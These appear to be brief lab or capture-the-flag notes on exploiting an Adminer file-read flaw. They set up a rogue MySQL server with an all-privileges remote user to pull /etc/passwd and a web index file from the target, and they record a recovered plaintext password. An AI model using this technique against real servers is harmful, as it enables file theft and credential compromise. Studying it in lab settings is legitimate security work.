4 adminer-php
Last updated
Last updated
adminer.php
Using https://www.foregenix.com/blog/serious-vulnerability-discovered-in-adminer-tool
Update bind-address=0.0.0.0
in /etc/mysql/mariadb.conf.d/50-server.cnf
Need to setup mysql on kali. sudo service mysql start
Reset root password for mysql using https://www.techrepublic.com/article/how-to-set-change-and-recover-a-mysql-root-password/
Create User on mysql
CREATE USER 'kashz'@'%' IDENTIFIED BY 'kashz';
GRANT ALL ON *.* TO 'kashz'@'%' IDENTIFIED BY 'kashz';
FLUSH PRIVILEGES;
Create database pwn
Create table data
with field out
as varchar(256)
/etc/passwd
/var/www/html/index.php
We see different password
Using waldo:&<h5b~yK3F#{PaPB&dA}{H>